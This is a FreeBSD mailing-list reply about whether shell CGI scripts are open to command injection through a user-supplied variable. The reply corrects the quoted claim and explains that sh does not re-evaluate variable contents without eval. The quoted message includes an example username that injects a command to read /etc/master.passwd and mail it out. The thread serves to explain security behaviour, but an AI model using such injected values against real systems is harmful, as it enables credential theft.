In the last episode (Feb 04), Loren M. Lang said:
> Actually, I think you should work on sh first, it's a much bigger
> security hazard than perl. If you've ever written much sh, you'd
> realize with it's much loser syntax, it's easy to get into trouble.
> At least perl provides use strict and -Tw. Someone using sh to write
> cgi scripts is the worst. Imagine someone writing the following like
> for a sh cgi script where $USERNAME is a cgi paramater passed into
> the following script:
>
> echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"
>
> What if someone wrote the following username and apache was running as
> root:
>
> charlie; cat /etc/master.passwd | mail [EMAIL PROTECTED]; echo
Then you would get a web page containing:
<HTML><HEAD><TITLE>Welcome, charlie; cat /etc/master.passwd | mail [EMAIL
PROTECTED]; echo</TITLE></HEAD>
. The shell doesn't re-interpret its input unless explicitly told to
via the "eval" command. /bin/sh is a little limited for more complex
scripts due to its lack of arrays, though, so zsh/ksh/bash are much
better choices :)
--
Dan Nelson
[EMAIL PROTECTED]
_______________________________________________
[email protected] mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "[EMAIL PROTECTED]"
